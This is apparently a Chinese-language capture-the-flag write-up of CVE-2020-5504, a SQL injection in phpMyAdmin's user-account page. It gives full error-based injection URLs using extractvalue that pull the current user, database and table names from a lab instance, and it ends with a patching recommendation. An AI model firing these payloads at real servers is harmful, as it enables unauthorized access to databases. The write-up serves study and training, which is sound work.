漏洞介绍
名称: phpmyadmin SQL注入 (CVE-2020-5504) 描述: phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。
解题过程
1.访问题目环境,因为这个漏洞是phpmyadmin的后台漏洞,所以使用题目中给出的账号密码登录进后台 2.在后台中点击查询按钮进行抓包,在数据包中记下此时的token值
3.构造payload,主要要将payload中的token改成自己刚才记下来的
http://118.193.36.37:48071/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))–+db=&token=3a24315a404d62254b3b602376403b52&viewing_mode=server
4.访问构造好的url,在页面报错信息中看到了我们构造的url执行了,查询到了用户名 root@localhost
查询数据库,结果为 mysql
http://118.193.36.37:23889/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))–+db=&token=2c57504a36397e6e4a7b4473552b5f3b&viewing_mode=server
查询第一个表
http://118.193.36.37:23889/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27mysql%27%20limit%200,1),0x7e))–+db=&token=2c57504a36397e6e4a7b4473552b5f3b&viewing_mode=server
查询第二个表
http://118.193.36.37:58966/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27mysql%27%20limit%201,1),0x7e))–+db=&token=567a49482e5d67287c703c476f6f2960&viewing_mode=server
下面就是常规的操作了,就不搞了
(不知道为啥,我用sqlmap扫不出来有sql注入漏洞,要不用sqlmap方便多了,呜呜)
修复建议
联系厂商,更新为最新版本!
|